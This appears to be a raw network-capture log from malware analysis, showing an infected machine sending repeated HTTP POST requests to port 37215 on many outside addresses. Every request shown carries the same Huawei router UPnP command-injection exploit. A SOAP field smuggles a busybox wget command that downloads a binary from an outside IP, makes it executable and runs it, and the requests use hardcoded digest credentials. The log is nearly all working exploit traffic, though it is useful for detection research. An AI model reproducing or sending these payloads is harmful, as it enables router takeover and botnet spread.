                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2140192.168.2.1555338181.105.49.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120536089 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2141192.168.2.155497045.160.23.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120537043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2142192.168.2.1555576122.172.47.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120543957 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2143192.168.2.1544770122.95.123.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120575905 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2144192.168.2.155990837.5.104.9837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120583057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2145192.168.2.154771237.23.83.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120630980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2146192.168.2.1557984187.65.74.13437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120635986 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2147192.168.2.1548898157.98.177.18237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120639086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2148192.168.2.1542044222.187.118.20037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120646000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2149192.168.2.154045845.185.6.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120652914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2150192.168.2.1545518157.202.210.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120765924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
